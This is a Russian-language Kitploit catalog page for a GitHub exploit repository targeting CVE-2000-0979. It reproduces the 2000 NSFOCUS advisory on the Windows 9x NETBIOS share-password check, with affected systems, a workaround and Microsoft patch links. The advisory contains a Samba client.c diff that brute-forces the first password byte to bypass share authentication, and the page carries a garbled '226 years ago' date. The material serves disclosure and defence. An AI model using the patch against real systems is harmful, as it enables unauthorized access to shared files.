Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
Инструменты/GitHubGitHub/z6543/cve-2000-0979
Exploit FrameworksVulnerability AnalysisExploitationNetwork SecurityPenetration Testing
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

Репозиторий
226 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2000-0979

CVE-2000-0979.rb — это автономный инструмент для эксплуатации CVE-2000-0979 против службы SMB Windows 95.

msf_2000_0979.rb — это модуль Metasploit. Вы можете скопировать его в ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

Модуль MSF

Более подробная документация появится в ближайшее время!

Оригинальное уведомление

Уведомление безопасности NSFOCUS (SA2000-05)

Тема: Уязвимость проверки пароля NETBIOS в Microsoft Windows 9x

Дата выпуска: 24 августа 2000 г. Дата обновления: 11 октября 2000 г.

Затронутые системы

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

Незатронутые системы

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

Воздействие

Уязвимость существует в схеме проверки пароля, используемой в реализации протокола NETBIOS Microsoft Windows 9x. Эта уязвимость позволяет любому пользователю получить доступ к службе общих файлов Windows 9x с защитой паролем. Злоумышленнику не нужно знать пароль общего ресурса.

Описание

Вы можете установить пароль для защиты общих ресурсов системы Microsoft Windows 9x. Но существует уязвимость в схеме проверки пароля, используемой в реализации протокола NETBIOS Microsoft Windows 9x. Для проверки пароля длина пароля зависит от длины данных, отправленных от клиента к серверу. То есть, если клиент устанавливает длину пароля в один байт и отправляет пакет с паролем в открытом виде на сервер, сервер сравнит его только с первым байтом общего пароля (в открытом виде), и если они совпадут, процесс проверки считается завершенным. Все, что нужно злоумышленнику, — это угадать и попробовать первый байт пароля на жертве. Система удаленного управления Windows 9x также уязвима, поскольку использует тот же метод аутентификации общего пароля.

Эксплойт

Вот простой пример, демонстрирующий эту ошибку. Получите исходный пакет Samba и измените source/client/client.c следующим образом:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

Обходной путь

Закройте общую службу файлов и принтеров Microsoft.

Решение

Microsoft была проинформирована и выпустила бюллетень безопасности, касающийся этой ошибки.

Бюллетень доступен по адресу:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

Исправления доступны по адресу:

. Microsoft Windows 95

Исправление будет доступно в ближайшее время

. Microsoft Windows 98 и 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

ПРЕДОСТАВЛЕННАЯ ИНФОРМАЦИЯ ПУБЛИКУЕТСЯ NSFOCUS «КАК ЕСТЬ» БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ. NSFOCUS ОТКАЗЫВАЕТСЯ ОТ ВСЕХ ГАРАНТИЙ, ЯВНЫХ ИЛИ ПОДРАЗУМЕВАЕМЫХ, ЗА ИСКЛЮЧЕНИЕМ ГАРАНТИИ ТОВАРНОЙ ПРИГОДНОСТИ. НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ NSFOCUS НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБЫЕ УБЫТКИ, ВКЛЮЧАЯ ПРЯМЫЕ, КОСВЕННЫЕ, СЛУЧАЙНЫЕ, ПОСЛЕДУЮЩИЕ, ПОТЕРЮ ПРИБЫЛИ ИЛИ СПЕЦИАЛЬНЫЕ УБЫТКИ, ДАЖЕ ЕСЛИ NSFOCUS БЫЛА УВЕДОМЛЕНА О ВОЗМОЖНОСТИ ТАКИХ УБЫТКОВ. РАСПРОСТРАНЕНИЕ ИЛИ ВОСПРОИЗВЕДЕНИЕ ИНФОРМАЦИИ ДОПУСКАЕТСЯ ПРИ УСЛОВИИ, ЧТО УВЕДОМЛЕНИЕ НЕ БЫЛО ИЗМЕНЕНО КАКИМ-ЛИБО ОБРАЗОМ.

?Copyright 1999-2000 NSFOCUS. Все права защищены. Условия использования.

Команда безопасности NSFOCUS [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

Скачать инструмент